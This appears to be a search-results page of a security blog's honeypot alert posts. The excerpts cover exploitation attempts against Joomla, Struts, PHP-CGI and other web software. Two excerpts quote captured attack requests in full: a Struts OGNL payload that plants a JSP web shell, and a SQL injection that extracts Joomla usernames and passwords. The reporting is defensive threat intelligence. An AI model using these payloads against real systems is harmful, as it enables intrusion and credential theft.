Showing 49 results for: [Honeypot Alert] ×

Joomla 0-Day Exploited In the Wild (CVE-2015-8562)

A recent new 0-day in Joomla discovered by Sucuri (Sucuri Blog) has drawn a lot of attention from the Joomla community, as well as attackers. Using knowledge gained from our recent research on Joomla (CVE-2015-7857, SpiderLabs Blog Post) and information...

Shellshock a Week Later: What We Have Seen

Trustwave, like most other information security firms, has been busy investigating the ShellShock vulnerability and subsequent scanning and exploit attempts. The SpiderLabs team at Truswave wanted to give the community some feedback on what we are seeing happening "in the...

[Honeypot Alert] Open Flash Charts File Upload Attacks

Our web honeypots picked up some increased scanning/exploit activity for the following file upload vulnerability in Open Flash Charts - The following screenshot shows the contents of the vulnerable ofc_upload_image.php file: As you can see from this simple code, there...

[Honeypot Alert] JCE Joomla Extension Attacks

Our web honeypots picked up some increased exploit attempts for an old Joomla Content Editor (JCE) Extension vulnerability. Although this vulnerability is a few years old, botnet owners are heavily scanning for sites that are vulnerable and attempting to exploit...

[Honeypot Alert] More PHP-CGI Scanning (apache-magika.c)

In the past 24 hours, one of the WASC Distributed Web Honeypot participant's sensors picked up continued scanning for CVE-2012-1823 which is a vulnerability within PHP-CGI. Here is a screenshot taken from the ModSecurity WAF alert data: PHP-CGI Attack The...

[Honeypot Alert] Probes for Apache Struts 2.X OGNL Vulnerability

Today our web honeypot sensors picked up probes for the recent Apache Struts 2.X OGNL vulnerability (CVE-2013-2251): 222.136.0.151 - - [16/Aug/2013:09:25:21 +0200] "GET /index.action? redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest' ),%23p%3d(%23req.getRealPath(%22/%22)%2b%22inback.jsp%22).replaceAll(\"\\\\\\\\\",%20\"/\" ),new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c %22)).close()}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull) (new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%2 2f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e HTTP/1.1" 404 291 "-" "Sturt2" Struts users are strongly encouraged...

The Life Cycle of Web Server Botnet Recruitment

This blog post is an excerpt taken from the recently released Global Security Report (GSR) for 2013. Over the course of the past year, my team has monitored and analyzed vast amounts of data within our Web honeypots and shared...

[Honeypot Alert] User-Agent Field PHP Injection Attacks

In a previous Honeypot Alert blog post, I showed an example of attackers using LFI attacks to access /proc/self/environ to execute code within the User-Agent field. Our web honeypots have identified more probes of this type. Here is an example...

[Honeypot Alert] SQL Injection Scanning Targeting Joomla Plugins

The following SQL Injection attack payloads targeting Joomla components were identified in our web honeypot sensor logs: 91.213.96.32 - - [28/Nov/2012:11:31:04 +0100] "GET /index.php?option=com_joomgalaxy&view=categorylist&type=thumbnail&lang=en&catid=100000001-100000001=0 union (select 1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),3,4,5,6,7,8,9,10,11,12,13+from+jos_users) HTTP/1.1" 400 299 "-" "-" 92.38.226.14 - - [28/Nov/2012:11:31:42 +0100] "GET /index.php?option=com_spidercalendar&date=999999.9' union...